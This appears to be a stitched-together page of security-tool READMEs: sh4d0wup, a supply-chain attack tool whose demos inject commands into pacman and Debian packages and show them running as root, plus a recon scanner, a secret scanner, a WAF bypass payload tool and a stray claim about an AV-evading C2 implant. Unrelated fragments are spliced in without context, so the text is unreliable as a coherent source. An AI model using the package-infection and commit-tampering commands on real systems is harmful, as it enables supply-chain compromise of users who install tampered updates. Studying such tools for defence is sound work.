Usage: a.out [OPTIONS] <COMMAND>
Commands:
bait Start a malicious update server
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
completions Generate shell completions
help Print this message or the help of the given subcommand(s)
Options:
-v, --verbose... Turn debugging information on
-h, --help Print help information
sh4d0wup infect pacman
% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...
Packages (1) sh4d0wup-0.2.0-2
Total Installed Size: 13.36 MiB
Net Upgrade Size: 0.00 MiB
:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflicts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk
sh4d0wup infect deb
% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: delaying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...
sh4d0wup infect oci
Here's a short oneliner on how to take the latest commit from a git repository, send it to a remote computer that has sh4d0wup installed to tweak it until the commit id starts with the provided --collision-prefix
and then insert the new commit back into the repository on your local computer:
% git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin
This may take some time, eventually it shows a commit id that you can use to create a new branch:
git show 777754fde8...
git branch some-name 777754fde8...
CIS Benchmark testing of Windows SIEM configuration
This is an application for testing the configuration of Windows Audit Policy settings against the CIS Benchmark recommended settings. A few points:
Further details on usage and other background info are at https://www.seven-stones.biz/blog/auditpolcis-automating-windows-siem-cis-benchmarks-testing/
How it works • Installation • Usage • MODES • For Developers • Credits
Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.
SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.
In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.
SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3
[Thanks ChatGPT for the Description]
This tool mainly performs 3 tasks
SCRIPTKIDDI3 requires several external tools to run successfully. Run the following commands to install the latest version with all requirements:
git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh
scriptkiddi3 -h
This will display help for the tool. Here are all the switches it supports.
[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.
[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode
Features of EXPLOIT mode: subdomain enumeration, URL enumeration,
vulnerability detection with Nuclei,
and scan for SUBDOMAIN TAKEOVER
[FLAGS:]
[TARGET:] -d, --domain target domain to scan
[CONFIG:] -c, --config path of your configuration file for subfinder
[HELP:] -h, --help to get help menu
[UPDATE:] -u, --update to update tool
[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com
Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com
Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m URL -d target.com
Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE
scriptkiddi3 -m EXP -d target.com
FULL EXPLOITATION MODE contains following functions
Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE
scriptkiddi3 -m SUB -d target.com
SUBDOMAIN ENUMERATION MODE contains following functions
Run scriptkiddi3 in URL ENUMERATION MODE
scriptkiddi3 -m URL -d target.com
URL ENUMERATION MODE contains following functions
Using your own CONFIG File for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
You can also provide your own CONFIG file with your API keys for subdomain enumeration with subfinder.
To update the tool to the latest version, run the following command:
scriptkiddi3 -u
An Example of config.yaml
binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password
If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.
If you have any other queries, you can always contact me on Twitter (thecyberneh).
I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.
[Disclaimer]: Use of this project is for educational/testing purposes only. Using it on unauthorised machines is strictly forbidden. If somebody is found to use it for illegal/malicious intent, the author of the repo will not be held responsible.
Install the PRAW library for Python 3:
pip3 install praw
See the Quickstart guide on how to get going right away!
Below is a demonstration of the XOR-encrypted C2 traffic for understanding purposes:
Since it is a custom C2 implant, it doesn't get detected by any AV, as the behaviour is completely legitimate.
Special thanks to @T4TCH3R for working with me and contributing to this project.
Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data. It is useful both for offensive and defensive security testing.
Key features:
This open-source version of Nosey Parker is a reimplementation of the internal version that is regularly used in offensive security engagements at Praetorian. The internal version has additional capabilities for false positive suppression and an alternative machine learning-based detection engine. Read more in blog posts here and here.
1. (On x86_64) Install the Hyperscan library and headers for your system
On macOS using Homebrew:
brew install hyperscan pkg-config
On Ubuntu 22.04:
apt install libhyperscan-dev pkg-config
1. (On non-x86_64) Build Vectorscan from source
You will need several dependencies, including cmake
, boost
, ragel
, and pkg-config
.
Download and extract the source for the 5.4.8 release of Vectorscan:
wget https://github.com/VectorCamp/vectorscan/archive/refs/tags/vectorscan/5.4.8.tar.gz && tar xfz 5.4.8.tar.gz
Build with cmake:
cd vectorscan-vectorscan-5.4.8 && cmake -B build -DCMAKE_BUILD_TYPE=Release . && cmake --build build
Set the HYPERSCAN_ROOT
environment variable so that Nosey Parker builds against your from-source build of Vectorscan:
export HYPERSCAN_ROOT="$PWD/build"
Note: The Nosey Parker Dockerfile
builds Vectorscan from source and links against that.
2. Install the Rust toolchain
Recommended approach: install from https://rustup.rs
3. Build using Cargo
cargo build --release
This will produce a binary at target/release/noseyparker
.
A prebuilt Docker image is available for the latest release for x86_64:
docker pull ghcr.io/praetorian-inc/noseyparker:latest
A prebuilt Docker image is available for the most recent commit for x86_64:
docker pull ghcr.io/praetorian-inc/noseyparker:edge
For other architectures (e.g., ARM) you will need to build the Docker image yourself:
docker build -t noseyparker .
Run the Docker image with a mounted volume:
docker run -v "$PWD":/opt/ noseyparker
Note: The Docker image runs noticeably slower than a native binary, particularly on macOS.
Most Nosey Parker commands use a datastore. This is a special directory that Nosey Parker uses to record its findings and maintain its internal state. A datastore will be implicitly created by the scan
command if needed. You can also create a datastore explicitly using the datastore init -d PATH
command.
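For example, a datastore can be created up front and then scanned into; np.myproject and the scan path are placeholders:
noseyparker datastore init -d np.myproject
noseyparker scan --datastore np.myproject /path/to/code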
Nosey Parker has built-in support for scanning files, recursively scanning directories, and scanning the entire history of Git repositories.
For example, if you have a Git clone of CPython locally at cpython.git
, you can scan its entire history with the scan
command. Nosey Parker will create a new datastore at np.cpython
and save its findings there.
$ noseyparker scan --datastore np.cpython cpython.git
Found 28.30 GiB from 18 plain files and 427,712 blobs from 1 Git repos [00:00:04]
Scanning content ββββββββββββββββββββ 100% 28.30 GiB/28.30 GiB [00:00:53]
Scanned 28.30 GiB from 427,730 blobs in 54 seconds (538.46 MiB/s); 4,904/4,904 new matches
Rule Distinct Groups Total Matches
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
PEM-Encoded Private Key 1,076 1,192
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2
Run the `report` command next to show finding details.
Nosey Parker can also scan Git repos that have not already been cloned to the local filesystem. The --git-url URL
, --github-user NAME
, and --github-org NAME
options to scan
allow you to specify repositories of interest.
For example, to scan the Nosey Parker repo itself:
$ noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker
For example, to scan accessible repositories belonging to octocat
:
$ noseyparker scan --datastore np.noseyparker --github-user octocat
These input specifiers will use an optional GitHub token if available in the NP_GITHUB_TOKEN
environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.
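A sketch of combining the token with these input specifiers; the token value and datastore name are placeholders:
export NP_GITHUB_TOKEN=ghp_your_token_here   # placeholder, use your own token
noseyparker scan --datastore np.github --github-user octocat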
See noseyparker help scan
for more details.
Nosey Parker prints out a summary of its findings when it finishes scanning. You can also run this step separately:
$ noseyparker summarize --datastore np.cpython
Rule Distinct Groups Total Matches
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
PEM-Encoded Private Key 1,076 1,192
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2
Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT
option.
To see details of Nosey Parker's findings, use the report
command. This prints out a text-based report designed for human consumption:
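For the CPython datastore created earlier, a minimal invocation would be the following, assuming report accepts the same --datastore option as scan and summarize:
noseyparker report --datastore np.cpython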
Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.
To list URLs for repositories belonging to GitHub users or organizations, use the github repos list command. This command uses the GitHub REST API to enumerate repositories belonging to one or more users or organizations. For example:
command. This command uses the GitHub REST API to enumerate repositories belonging to one or more users or organizations. For example:
$ noseyparker github repos list --user octocat
https://github.com/octocat/Hello-World.git
https://github.com/octocat/Spoon-Knife.git
https://github.com/octocat/boysenberry-repo-1.git
https://github.com/octocat/git-consortium.git
https://github.com/octocat/hello-worId.git
https://github.com/octocat/linguist.git
https://github.com/octocat/octocat.github.io.git
https://github.com/octocat/test-repo1.git
An optional GitHub Personal Access Token can be provided via the NP_GITHUB_TOKEN
environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.
Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT
option.
See noseyparker help github
for more details.
Running the noseyparker
binary without arguments prints top-level help and exits. You can get abbreviated help for a particular command by running noseyparker COMMAND -h
.
Tip: More detailed help is available with the help
command or long-form --help
option.
Contributions are welcome, particularly new regex rules. Developing new regex rules is detailed in a separate document.
If you are considering making significant code changes, please open an issue first to start discussion.
Nosey Parker is licensed under the Apache License, Version 2.0.
Any contribution intentionally submitted for inclusion in Nosey Parker by you, as defined in the Apache 2.0 license, shall be licensed as above, without any additional terms or conditions.
WAF Bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by the Nemesida WAF team with the participation of the community.
It is forbidden to use this tool for illegal purposes. Don't break the law. We are not responsible for possible risks associated with the use of this software.
The latest waf-bypass is always available via Docker Hub. It can be easily pulled via the following command:
# docker pull nemesida/waf-bypass
# docker run nemesida/waf-bypass --host='example.com'
# git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
# python3 -m pip install -r /opt/waf-bypass/requirements.txt
# python3 /opt/waf-bypass/main.py --host='example.com'
'--proxy'
(--proxy='http://proxy.example.com:3128'
) - option allows to specify where to connect to instead of the host.
'--header'
(--header 'Authorization: Basic YWRtaW46YWRtaW4=' --header 'X-TOKEN: ABCDEF'
) - option allows to specify the HTTP header to send with all requests (e.g. for authentication). Multiple use is allowed.
'--user-agent'
(--user-agent 'MyUserAgent 1/1'
) - option allows to specify the HTTP User-Agent to send with all requests, except when the User-Agent is set by the payload ("USER-AGENT"
).
'--block-code'
(--block-code='403' --block-code='222'
) - option allows you to specify the HTTP status code to expect when the request is blocked by the WAF (default is 403
). Multiple use is allowed.
'--threads'
(--threads=15
) - option allows to specify the number of parallel scan threads (default is 10
).
'--timeout'
(--timeout=10
) - option allows to specify a request processing timeout in sec. (default is 30
).
'--json-format'
- an option that allows you to display the result of the work in JSON format (useful for integrating the tool with security platforms).
'--details'
- display the False Positive and False Negative payloads. Not available in JSON
format.
'--exclude-dir'
- exclude the payload's directory (--exclude-dir='SQLi' --exclude-dir='XSS'
). Multiple use is allowed.
Depending on the purpose, payloads are located in the appropriate folders:
When compiling a payload, the following zones, method and options are used (the available zones include URL, ARGS, BODY, COOKIE and HEADER; see below). An additional payload encoding (Base64, HTML-ENTITY, UTF-16) can be applied on top of the payload's own encoding. Multiple values are indicated with a space (e.g. Base64 UTF-16). This applies only to the ARGS, BODY, COOKIE and HEADER zones, is not applicable to payloads in the API and MFD directories, and is not compatible with the JSON option.
Except for some cases described below, the zones are independent of each other and are tested separately (i.e. if 2 zones are specified, the script will send 2 requests, alternately checking one zone and then the other).
For the zones you can use the %RND% suffix, which allows you to generate an arbitrary string of 6 letters and numbers (e.g.: param%RND%=my_payload or param=%RND% OR A%RND%B).
You can create your own payloads. To do this, create your own folder in the '/payload/' folder, or place the payload in an existing one (e.g. '/payload/XSS'). The allowed data format is JSON.
API testing payloads located in the API directory are automatically sent with the header 'Content-Type: application/json'.
For MFD (multipart/form-data) payloads located in this directory, you must specify the BODY
(required) and BOUNDARY
(optional). If BOUNDARY
is not set, it will be generated automatically (in this case, only the payload must be specified for the BODY, without additional data ('... Content-Disposition: form-data; ...'
)).
If a BOUNDARY
is specified, then the content of the BODY
must be formatted in accordance with the RFC, but this allows for multiple payloads in the BODY, separated by the BOUNDARY.
Other zones are allowed in this directory (e.g.: URL
, ARGS
etc.). Regardless of the zone, header 'Content-Type: multipart/form-data; boundary=...'
will be added to all requests.
The changelog summary since the 2022.4 release from December: